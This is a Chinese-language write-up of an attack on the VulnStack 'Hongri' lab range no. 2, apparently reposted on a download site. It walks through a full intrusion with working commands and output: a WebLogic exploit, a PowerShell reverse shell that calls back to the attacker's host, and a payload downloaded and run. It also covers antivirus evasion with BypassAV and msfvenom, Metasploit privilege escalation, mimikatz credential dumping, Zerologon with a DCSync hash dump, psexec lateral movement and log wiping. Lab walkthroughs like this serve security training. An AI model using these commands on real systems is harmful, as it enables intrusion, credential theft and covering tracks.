您的位置:首頁 > 軟件教程 > 教程 > VulnStack-紅日靶機(jī)二

VulnStack-紅日靶機(jī)二

來源:好特整理 | 時(shí)間:2024-09-27 10:07:06 | 閱讀:79 |  標(biāo)簽: a T v K S C   | 分享到:

紅日靶機(jī)二 環(huán)境搭建 只需要把虛擬機(jī)的 host-only(僅主機(jī))網(wǎng)卡改為 10.10.10.0 網(wǎng)段,如下配置 把 NAT 網(wǎng)卡,改為 192.168.96.0 網(wǎng)段,如下 首先恢復(fù)到 v1.3 快照 讓后點(diǎn)擊放棄,放棄后再開機(jī),用其他用戶 .\de1ay:1qaz@WSX 憑證登陸,密碼過期修

紅日靶機(jī)二

環(huán)境搭建

只需要把虛擬機(jī)的 host-only (僅主機(jī))網(wǎng)卡改為 10.10.10.0 網(wǎng)段,如下配置

VulnStack-紅日靶機(jī)二

NAT 網(wǎng)卡,改為 192.168.96.0 網(wǎng)段,如下

VulnStack-紅日靶機(jī)二

首先恢復(fù)到 v1.3 快照

VulnStack-紅日靶機(jī)二

讓后點(diǎn)擊放棄,放棄后再開機(jī),用其他用戶 .\de1ay:1qaz@WSX 憑證登陸,密碼過期修改密碼就登陸成功了

完成后開啟 WEB 服務(wù)器中的 WebLogic 服務(wù) 

C:\Oracle\Middleware\user_projects\domains\base_domain\bin

VulnStack-紅日靶機(jī)二

以管理員省份運(yùn)行

搭建完成,我們登入 kali

一、nmap 掃描

1)主機(jī)發(fā)現(xiàn) 

sudo nmap -sn -o hosts 192.168.111.0/24

MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.111.80
Host is up (0.00013s latency).
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap scan report for 192.168.111.201

看到 192.168.111.201 192.168.111.80 為新增加的 ip

2)端口發(fā)現(xiàn)

192.168.111.80 

sudo nmap -sT --min-rate 10000 -p- 192.168.111.80 -o 80_ports    

Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 16:09 CST
Nmap scan report for 192.168.111.80
Host is up (0.00040s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
3389/tcp  open  ms-wbt-server
7001/tcp  open  afs3-callback
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49175/tcp open  unknown
49261/tcp open  unknown
60966/tcp open  unknown
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.04 seconds

192.168.111.201 

sudo nmap -sT --min-rate 10000 -p- 192.168.111.201 -o 201_ports 

Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 16:04 CST
Nmap scan report for 192.168.111.201
Host is up (0.00045s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49178/tcp open  unknown
MAC Address: 00:0C:29:84:B4:3E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds

看到 192.168.111.80 的機(jī)器開啟了 80 和 7001 端口,這顯然讓我們很感興趣,因?yàn)?web 的攻擊面是廣泛的,同時(shí) 7001 是 webLogic 的默認(rèn)端口。我們對(duì) 192.168.111.80 進(jìn)行詳細(xì)信息掃描

3)詳細(xì)信息掃描

首先我們對(duì)開放端口進(jìn)行處理,加快掃描的速度和準(zhǔn)確性

把開放端口復(fù)制給 ports 變量 

ports=$(cat 80_ports | grep open | awk -F/ '{print $1}' | paste -sd ,)

VulnStack-紅日靶機(jī)二

在輸入$ports 后按 tab 鍵會(huì)補(bǔ)全 

sudo nmap -sT -sV -sC -O -p$ports 192.168.111.80 -o details

# Nmap 7.93 scan initiated Tue Sep 24 16:18:25 2024 as: nmap -sT -sV -sC -O -p80,135,139,445,1433,3389,7001,49152,49153,49154,49175,49261,60966 -o details 192.168.111.80
Nmap scan report for 192.168.111.80
Host is up (0.00080s latency).

PORT      STATE SERVICE        VERSION
80/tcp    open  http           Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp  open  ms-sql-s       Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after:  2054-09-24T07:53:06
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   192.168.111.80:1433: 
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
| ms-sql-info: 
|   192.168.111.80:1433: 
|     Version: 
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
3389/tcp  open  ms-wbt-server?
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2024-09-23T07:46:09
|_Not valid after:  2025-03-25T07:46:09
| rdp-ntlm-info: 
|   Target_Name: DE1AY
|   NetBIOS_Domain_Name: DE1AY
|   NetBIOS_Computer_Name: WEB
|   DNS_Domain_Name: de1ay.com
|   DNS_Computer_Name: WEB.de1ay.com
|   DNS_Tree_Name: de1ay.com
|   Product_Version: 6.1.7601
|_  System_Time: 2024-09-24T08:19:51+00:00
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
7001/tcp  open  http           Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49175/tcp open  msrpc          Microsoft Windows RPC
49261/tcp open  msrpc          Microsoft Windows RPC
60966/tcp open  ms-sql-s       Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info: 
|   192.168.111.80:60966: 
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after:  2054-09-24T07:53:06
| ms-sql-info: 
|   192.168.111.80:60966: 
|     Version: 
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 60966
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.93%I=7%D=9/24%Time=66F275DE%P=x86_64-pc-linux-gnu%r(Te
SF:rminalServerCookie,13,"\x03\0\0\x13\x0e\xd0\0\0\x124\0\x02\x01\x08\0\x0
SF:2\0\0\0");
MAC Address: 00:0C:29:BE:34:8C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7
OS details: Microsoft Windows 7
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WEB
|   NetBIOS computer name: WEB\x00
|   Domain name: de1ay.com
|   Forest name: de1ay.com
|   FQDN: WEB.de1ay.com
|_  System time: 2024-09-24T16:19:55+08:00
|_clock-skew: mean: -53m19s, deviation: 2h39m58s, median: 0s
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-09-24T08:19:54
|_  start_date: 2024-09-24T07:53:08

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 24 16:20:30 2024 -- 1 IP address (1 host up) scanned in 124.83 seconds

看到 7001 就是 Weblogic 的服務(wù)

二、Web 滲透

打開 80 頁面

VulnStack-紅日靶機(jī)二

是空白頁,我們只能放棄 80 了。

打開 7001 端口

VulnStack-紅日靶機(jī)二

看到是有內(nèi)容的,我們?cè)L問 Weblogic 的默認(rèn)登錄頁面 

http://192.168.111.80:7001/console/login/LoginForm.jsp

VulnStack-紅日靶機(jī)二

左下角透露出 Weblogic 的版本信息 10.3.6.0

用 weblogicScanner 掃描攻擊枚舉一下 

git clone https://github.com/0xn0ne/weblogicScanner.git
cd weblogicScanner
python ws.py -t 192.168.111.80:7001 

[20:35:09][INFO] [!][CVE-2019-2890][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [!][CVE-2017-3248][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [-][CVE-2017-3248][192.168.111.80:7001] Not vulnerability.
[20:35:09][INFO] [-][CVE-2019-2890][192.168.111.80:7001] Not vulnerability.
[20:35:10][INFO] [+][CVE-2019-2618][192.168.111.80:7001] Found module, Please verify manually!
[20:35:10][INFO] [+][CVE-2017-3506][192.168.111.80:7001] Exists vulnerability!
[20:35:11][INFO] [!][CVE-2018-2893][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [!][CVE-2018-2628][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [-][CVE-2018-2628][192.168.111.80:7001] Not vulnerability.
[20:35:11][INFO] [-][CVE-2018-2893][192.168.111.80:7001] Not vulnerability.
[20:35:12][INFO] [!][CVE-2020-14882][192.168.111.80:7001] Connection error.
[20:35:12][INFO] [-][CVE-2020-14882][192.168.111.80:7001] Not vulnerability.
[20:35:13][INFO] [-][CVE-2017-10271][192.168.111.80:7001] Not vulnerability.
[20:35:14][INFO] [+][CVE-2019-2888][192.168.111.80:7001] Found module, Please verify manually!
[20:35:15][INFO] [+][CVE-2019-2725][192.168.111.80:7001] Exists vulnerability!
[20:35:19][INFO] [-][CVE-2020-2883][192.168.111.80:7001] Not vulnerability.
[20:35:19][INFO] [-][CVE-2018-3191][192.168.111.80:7001] Not vulnerability.
[20:35:20][INFO] [-][CVE-2020-2555][192.168.111.80:7001] Not vulnerability.
[20:35:21][INFO] [!][CVE-2020-2551][192.168.111.80:7001] Connection error.
[20:35:21][INFO] [-][CVE-2020-2551][192.168.111.80:7001] Not found.
[20:35:23][INFO] [+][CVE-2014-4210][192.168.111.80:7001] Found module, Please verify manually!
[20:35:24][INFO] [+][CVE-2016-3510][192.168.111.80:7001] Exists vulnerability!
[20:35:24][INFO] [-][CVE-2016-0638][192.168.111.80:7001] Not vulnerability.
[20:35:24][INFO] [+][CVE-2020-14750][192.168.111.80:7001] Exists vulnerability!
[20:35:25][INFO] [+][CVE-2018-3245][192.168.111.80:7001] Exists vulnerability!
[20:35:27][INFO] [-][CVE-2019-2729][192.168.111.80:7001] Not vulnerability.
[20:35:30][INFO] [-][Weblogic Console][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2018-2894][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2020-14883][192.168.111.80:7001] Not vulnerability.
[20:35:32][INFO] [-][CVE-2018-3252][192.168.111.80:7001] Not found.
Run completed, 30 seconds total.

過濾一下結(jié)果 

cat result.txt| grep + | sed -e  's/\[//g' | sed 's/\]/ /g'|awk '{print $4" " $6" " $7}' 
CVE-2019-2618 Found module,
CVE-2017-3506 Exists vulnerability!
CVE-2019-2888 Found module,
CVE-2019-2725 Exists vulnerability!
CVE-2014-4210 Found module,
CVE-2016-3510 Exists vulnerability!
CVE-2020-14750 Exists vulnerability!
CVE-2018-3245 Exists vulnerability!

看到有 8 個(gè)可能存在或已經(jīng)驗(yàn)證存在的,沒什么辦法,我們得一個(gè)一個(gè)試。 

python CVE-2019-2618.py url username password

看到 CVE-2019-2618.py 需要認(rèn)證信息,我們對(duì)這種有條件限制的漏洞肯定是要優(yōu)先級(jí)排后的

嘗試 CVE-2017-3506 發(fā)現(xiàn)成功了

github 地址: https://github.com/Al1ex/CVE-2017-3506

VulnStack-紅日靶機(jī)二

打開鏈接

VulnStack-紅日靶機(jī)二

看到用戶名 web\de1ay

三、獲得立足點(diǎn)

反彈 shell 

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.111.10', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

url 編碼 

powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient('192.168.111.10'%2C%204444)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%20%3D%20%24sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close()%22

VulnStack-紅日靶機(jī)二

成功反彈到 kali

執(zhí)行 

tasklist /svc

VulnStack-紅日靶機(jī)二

看到 360 的進(jìn)程,應(yīng)該是裝了 360 殺毒軟件的

四、免殺對(duì)抗

1)上線 cs

生成 cs 免殺木馬

我們要對(duì)上線到 cs 的木馬做免殺,用到 bypassAV 插件

baypassAV: https://github.com/hack2fun/BypassAV

因?yàn)檫@是靶機(jī)環(huán)境和虛擬環(huán)境的原因,導(dǎo)致 360 殺軟有部分功能的缺陷。我們使用 cs 插件做的初級(jí)免殺就可以通過。這里僅供學(xué)習(xí)參考 

git clone https://github.com/hack2fun/BypassAV.git

在 cs 中導(dǎo)入它的 bypass.cna 文件

VulnStack-紅日靶機(jī)二

導(dǎo)入成功

用 bypassAV 生成免殺程序

VulnStack-紅日靶機(jī)二

選擇 cs 的監(jiān)聽器

VulnStack-紅日靶機(jī)二

kali 開啟 python 的 web 服務(wù) 

python -m http.server

獲取的反彈 shell 中執(zhí)行 

 powershell iex(new-object system.net.webclient).downloadfile('http://192.168.111.10:8000/shell.exe','c:\programdata\shell.exe')

簡(jiǎn)單解釋:通過 iex(Invoke-Expression)執(zhí)行字符串的命令,用 webclient 發(fā)送 http 請(qǐng)求,下載 shell.exe 文件到機(jī)器上的 programdata 目錄

VulnStack-紅日靶機(jī)二

看到請(qǐng)求成功了,但是我們的 shell 死掉了,我們結(jié)束掉 shell,再次反彈一下

VulnStack-紅日靶機(jī)二

看到了我們上傳的木馬

運(yùn)行 

.\shell.exe

VulnStack-紅日靶機(jī)二

成功上線到 cs

2)上線 msf

a)直接轉(zhuǎn)移(失敗)

將 cs 會(huì)話遷移到 msf 上

在 msf 上 

use exploit/multi/handler
msf6 exploit(multi/handler) > set Lhost 192.168.111.10
Lhost => 192.168.111.10
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.111.10:4444

在 cs 上

添加一個(gè) foregin 的監(jiān)聽器

VulnStack-紅日靶機(jī)二

右鍵選擇 spawn

VulnStack-紅日靶機(jī)二

選擇剛建立的 foregin 監(jiān)聽器

VulnStack-紅日靶機(jī)二

VulnStack-紅日靶機(jī)二

看到失敗了,應(yīng)該是被 360 給攔截了

b)msf 混淆(成功)

看一下編碼器 

msfvenom -l encoder | grep x64
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru

生成一個(gè) msf 的木馬,做免殺上線吧 

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.10 LPORT=4444 -e x64/xor_dynamic -f exe -o payload.exe

VulnStack-紅日靶機(jī)二

用 msf 的參數(shù)做簡(jiǎn)單的混淆,這是靶機(jī),他只是真實(shí)環(huán)境的抽象,不可能說讓你去花很長(zhǎng)的時(shí)間,做一個(gè)真正的免殺

上傳

VulnStack-紅日靶機(jī)二

這里反彈 shell 的端口和 msf 木馬的監(jiān)聽端口沖突了,切換了 nc 的監(jiān)聽端口

執(zhí)行

VulnStack-紅日靶機(jī)二

VulnStack-紅日靶機(jī)二

成功獲得了 meterpreter

五、提權(quán)

1)cs 上提權(quán)

cs 上就比較簡(jiǎn)單了,直接利用梼杌(taowu)插件中的,權(quán)限提升模塊就可以完成提權(quán)。

VulnStack-紅日靶機(jī)二

一個(gè)一個(gè)點(diǎn)擊,點(diǎn)到 MS-14-058 時(shí),成功提權(quán)

VulnStack-紅日靶機(jī)二

2)msf 提權(quán)

msf 提權(quán)就比較繁瑣了

在 msf 中查看提權(quán)模塊 

search platform:windows type:exploit local

看到了很多提權(quán)的 exp,這就考驗(yàn)我們對(duì)提權(quán)的 exp 選擇的經(jīng)驗(yàn)了

下面列舉常見的提權(quán)漏洞,不論成功與否,我們都可以嘗試一下,我也會(huì)標(biāo)明

a)getsystem(失。

拿到 meterpreter 肯定現(xiàn)嘗試 getsystem

VulnStack-紅日靶機(jī)二

沒有提權(quán)成功

b)ms16_032(失。

secondary_logon_handle_privesc : 利用 Windows Secondary Logon 服務(wù)的漏洞。 

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > use windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 6
session => 6
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.111.10:4444 
[+] Compressed size: 1160
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[+] Deleted 
[*] Exploit completed, but no session was created.

c)ms14_058(成功)

ms14_058_track_popup_menu :利用了 Windows 中的 CVE-2014-6324 漏洞。該漏洞可以允許攻擊者在獲得最低權(quán)限的用戶會(huì)話中提升權(quán)限到管理員級(jí)別。

這里有重現(xiàn)連了一下,所以session的id變了 

use windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set target 1    
target => 1 
msf6 exploit(windows/local/ms14_058_track_popup_menu) >set session 2
session => 2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 192.168.111.10:4444 
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 4672 launched.
[*] Reflectively injecting the DLL into 4672...
[*] Sending stage (201798 bytes) to 192.168.111.80
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened (192.168.111.10:4444 -> 192.168.111.80:63084) at 2024-09-26 15:09:59 +0800

meterpreter >

看到提權(quán)成功了

VulnStack-紅日靶機(jī)二

d)bypassuac(失敗)

VulnStack-紅日靶機(jī)二

還有很多方式,感興趣可以自己嘗試

六、橫向滲透

1)域控發(fā)現(xiàn)

運(yùn)行mimikatz

VulnStack-紅日靶機(jī)二

看到憑證: de1ay:hongrisec@2024 , mssql:1qaz@WSX

VulnStack-紅日靶機(jī)二

VulnStack-紅日靶機(jī)二

利用portscan發(fā)現(xiàn)主機(jī)

VulnStack-紅日靶機(jī)二

VulnStack-紅日靶機(jī)二

看到存活主機(jī) 10.10.10.10 , 10.10.10.201 兩臺(tái)

VulnStack-紅日靶機(jī)二

同時(shí)也掃描到了,他們開放的一些端口 

10.10.10.201:3389
[+] received output:
10.10.10.201:139
10.10.10.201:135
10.10.10.10:5985
[+] received output:
10.10.10.10:3389
[+] received output:
10.10.10.10:636
10.10.10.10:593
[+] received output:
10.10.10.10:464
[+] received output:
10.10.10.10:389
[+] received output:
10.10.10.10:139
10.10.10.10:135
[+] received output:
10.10.10.10:88
[+] received output:
10.10.10.10:53
[+] received output:
10.10.10.10:445
10.10.10.201:445

可以在cs的beacon中使用 ping -a 來查看主機(jī)的域名稱 

shell ping -a -n 1 10.10.10.10

VulnStack-紅日靶機(jī)二 

shell ping -a -n 1 10.10.10.201

VulnStack-紅日靶機(jī)二

看到 10.10.10.10 的名稱為DC,大概率他就是域控主機(jī)

10.10.10.201 請(qǐng)求超時(shí)了,我們暫時(shí)還無法確認(rèn)它的身份

2)檢測(cè)漏洞

檢測(cè)域控主機(jī)是否存在zerologon漏洞

簡(jiǎn)單介紹一下zerologon:
編號(hào)CVE-2020-1427,是指在使用 NetLogon 安全通道與域控進(jìn)行連接時(shí),由于認(rèn)證協(xié)議加密加密部分存在缺陷,攻擊者可以將域控管理員用戶的密碼置空,從而進(jìn)一步實(shí)現(xiàn)密碼hash的獲取,并最終完全控制域控主機(jī)。

NetLogon組件是Windows上的一個(gè)重要的功能組件,用于域控網(wǎng)絡(luò)上認(rèn)證用戶和機(jī)器,復(fù)制數(shù)據(jù)庫進(jìn)行域控備份,維護(hù)域成員與域之間、域與域控之間、域DC與跨域DC之間的關(guān)系

在cs的beacon中執(zhí)行 

mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$

beacon> mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC.de1ay.com /account:DC$ command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote   : DC.de1ay.com
ProtSeq  : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no

Target : DC.de1ay.com
Account: DC$
Type   : 6 (Server)
Mode   : detect

Trying to 'authenticate'...
================================================================

  NetrServerAuthenticate2: 0x00000000

* Authentication: OK -- vulnerable

看到存在 zerologon 漏洞

3)漏洞利用 

mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit

[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote   : DC.de1ay.com
ProtSeq  : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no

Target : DC.de1ay.com
Account: DC$
Type   : 6 (Server)
Mode   : exploit

Trying to 'authenticate'...
==============================================================================================

  NetrServerAuthenticate2: 0x00000000
  NetrServerPasswordSet2 : 0x00000000

* Authentication: OK -- vulnerable
* Set password  : OK -- may be unstable

看到 Set password : OK

發(fā)起 dcsync 攻擊,獲得域控用戶hash 

mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC.de1ay.com /user:administrator /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm

[+] host called home, sent: 750705 bytes
[+] received output:
[DC] 'de1ay.com' will be the domain
[DC] 'DC.de1ay.com' will be the DC server
[DC] 'administrator' will be the user account
[AUTH] Username: DC$
[AUTH] Domain  : de1ay
[AUTH] Password: 
[AUTH] Explicit NTLM Mode

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 1601/1/1 8:00:00
Password last change : 2019/9/9 10:40:33
Object Security ID   : S-1-5-21-2756371121-2868759905-3853650604-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 161cff084477fe596a5db81874498a24

看到 Hash NTLM: 161cff084477fe596a5db81874498a24 這就是管理員的hash

我們拿到kali中破解一下 

hashcat creds /usr/share/wordlists/rockyou.txt -m 1000

VulnStack-紅日靶機(jī)二

看到憑證信息:

administrator:1qaz@WSX

添加到cs中

VulnStack-紅日靶機(jī)二

打開credentials,點(diǎn)擊add

VulnStack-紅日靶機(jī)二

添加完成

VulnStack-紅日靶機(jī)二

4)橫向移動(dòng)

a)域控

在192.168.111.80上添加listener

VulnStack-紅日靶機(jī)二

命名為DC

VulnStack-紅日靶機(jī)二

去到目標(biāo)中,選擇域控

VulnStack-紅日靶機(jī)二

選擇剛添加的憑證和監(jiān)聽器

VulnStack-紅日靶機(jī)二

看到域控上線成功

VulnStack-紅日靶機(jī)二

看到是域控的system權(quán)限

b)其他機(jī)器

獲得了域控權(quán)限,剩下的一臺(tái),直接psexec跳就可以了

VulnStack-紅日靶機(jī)二

session選擇域控的

VulnStack-紅日靶機(jī)二

VulnStack-紅日靶機(jī)二

看到 10.10.10.201 的system用戶已經(jīng)上線到

七、權(quán)限維持

我在以前的文章中做過這方面操作的匯總,具體可以參考我的文章

《windows權(quán)限維持匯總》

當(dāng)然也可以使用cs的插件完成

VulnStack-紅日靶機(jī)二

八、痕跡清理

主要就是要?jiǎng)h除我們?cè)诠暨^程中,生成的日志,以及自己為了滲透的順利進(jìn)行所上傳的文件

在cs的插件中可以刪除系統(tǒng)的值日

VulnStack-紅日靶機(jī)二

總結(jié)

  • 通過nmap的掃描發(fā)現(xiàn)了兩臺(tái)靶機(jī)的地址,分別做了端口掃描,發(fā)現(xiàn)192.168.111.80這臺(tái)機(jī)器開啟了80和7001端口,另一臺(tái)則沒有開啟。毫無疑問,我們肯定要把對(duì)80機(jī)器的滲透優(yōu)先級(jí)提前。
  • 通過對(duì)80和7001端口的訪問,發(fā)現(xiàn)7001就是默認(rèn)weblogic服務(wù),用weblogicscan漏洞枚舉工具發(fā)現(xiàn)它可能存在很多版本的漏洞,我們一個(gè)一個(gè)試錯(cuò),最終獲得了web機(jī)器的shell
  • 拿到web機(jī)器權(quán)限后,發(fā)現(xiàn)它的進(jìn)程中開啟了360殺毒軟件,對(duì)cs(msf)生成的木馬文件進(jìn)行了簡(jiǎn)單的免殺后,成功上線cs(msf)
  • 利用集成框架的提權(quán)模塊,成功提權(quán)道了system
  • 運(yùn)行mimikatz的zerologon模塊,探測(cè)到域控主機(jī)存在該漏洞,利用zerlogon成功橫向移動(dòng)到了域控主機(jī),并且獲得了域控的system權(quán)限。利用域控的憑證信息,同時(shí)也獲得了域內(nèi)其他主機(jī)的system權(quán)限

VulnStack-紅日靶機(jī)二

小編推薦閱讀

好特網(wǎng)發(fā)布此文僅為傳遞信息,不代表好特網(wǎng)認(rèn)同期限觀點(diǎn)或證實(shí)其描述。

a 1.0
a 1.0
類型:休閑益智  運(yùn)營狀態(tài):正式運(yùn)營  語言:中文   

游戲攻略

游戲禮包

游戲視頻

游戲下載

游戲活動(dòng)
《alittletotheleft》官網(wǎng)正版是一款備受歡迎的休閑益智整理游戲。玩家的任務(wù)是對(duì)日常生活中的各種雜亂物
K
K
類型:角色扮演  運(yùn)營狀態(tài):封測(cè)  語言:中文   

游戲攻略

游戲禮包

游戲視頻

游戲下載

游戲活動(dòng)
《K》是由樂次元開發(fā)的一款日系動(dòng)漫RPG游戲,游戲根據(jù)同名動(dòng)漫改編而來,高水準(zhǔn)的漫畫和音樂是這款游戲的

相關(guān)視頻攻略

更多

掃二維碼進(jìn)入好特網(wǎng)手機(jī)版本!

掃二維碼進(jìn)入好特網(wǎng)微信公眾號(hào)!

本站所有軟件,都由網(wǎng)友上傳,如有侵犯你的版權(quán),請(qǐng)發(fā)郵件[email protected]

湘ICP備2022002427號(hào)-10 湘公網(wǎng)安備:43070202000427號(hào)© 2013~2025 haote.com 好特網(wǎng)